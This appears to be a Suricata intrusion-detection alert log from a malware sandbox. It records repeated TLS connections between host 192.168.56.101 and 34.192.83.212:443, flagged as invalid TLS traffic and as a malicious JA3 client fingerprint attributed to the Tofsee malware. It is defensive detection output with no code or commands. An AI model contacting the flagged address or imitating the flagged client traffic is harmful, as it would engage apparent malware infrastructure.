TCP 34.192.83.212:443 -> 192.168.56.101:49366 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49388 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49388 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49430 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49430 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49376 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49430 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49376 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49376 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49408 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49408 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49408 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49430 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49376 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49430 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49376 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49408 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49408 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49431 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49377 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49431 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49377 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49397 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49431 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49377 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49413 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49397 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49413 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49397 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49413 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49397 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49397 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49384 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49384 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49450 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49414 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49384 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49450 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49414 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49450 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49399 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49414 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49399 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49399 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49384 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49384 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49450 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49414 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49450 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49414 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49399 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49399 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49400 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49400 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49419 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49400 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49419 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49401 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49419 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49401 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49401 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49400 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49400 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49419 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49419 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49401 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49401 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49407 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49407 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49407 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49437 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49437 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49410 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49437 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49410 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49410 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49407 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49407 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49437 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49437 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49417 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49417 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49422 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49417 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49422 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49439 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49422 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49439 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49439 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49417 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49422 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49422 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49417 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49439 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49439 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49423 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49423 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49418 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49423 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49418 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49445 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49418 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49445 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49423 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49445 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49423 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49418 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49418 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49454 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49454 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49428 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49454 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49421 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49428 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49421 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49421 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49428 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49454 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49454 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49428 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49428 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49426 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49457 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49426 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49457 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49426 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49457 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49429 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49429 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49429 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49426 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49426 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49429 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49429 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49452 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49452 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49452 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49434 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49452 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49434 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49452 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49434 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49434 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49434 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49463 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49463 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49463 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49463 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49436 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49463 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49436 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49436 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49465 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49465 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49465 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49442 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49442 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49442 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49465 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49465 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49442 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49442 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49444 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49444 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49444 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49444 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49444 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49447 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49447 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49447 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49447 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49447 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49453 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49453 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49453 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49453 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49453 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49460 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49460 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49460 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49460 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49460 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49461 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49461 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49461 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49461 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49461 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49416 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49416 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49169 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49169 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49241 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49241 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49317 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49317 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49372 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49372 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49188 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49188 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49277 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49277 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49468 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49316 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49316 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49392 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49392 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49445 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49445 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49333 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49333 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49204 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49204 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49312 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49312 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49377 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49377 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49365 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49365 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49325 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49389 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49389 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49325 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49278 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49278 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49300 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49300 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49421 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49421 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49270 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49183 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49270 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49183 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49403 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49199 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49403 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49199 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49446 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49275 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49446 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49436 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49275 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49436 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49281 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49431 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
